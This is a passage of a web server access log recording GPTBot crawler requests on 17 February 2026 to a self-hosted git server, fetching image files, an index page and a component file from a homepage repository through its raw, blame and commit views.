AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:13:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14592] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:13:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429932] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429927] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641792] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508437] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508446] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692331] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" -[17/Feb/2026:13:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10843] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" -[17/Feb/2026:13:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" -[17/Feb/2026:13:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" -[17/Feb/2026:13:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699390] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:13:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498825] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641785] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:13:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498827] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699378] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:13:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508448] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" -[17/Feb/2026:13:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:13:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 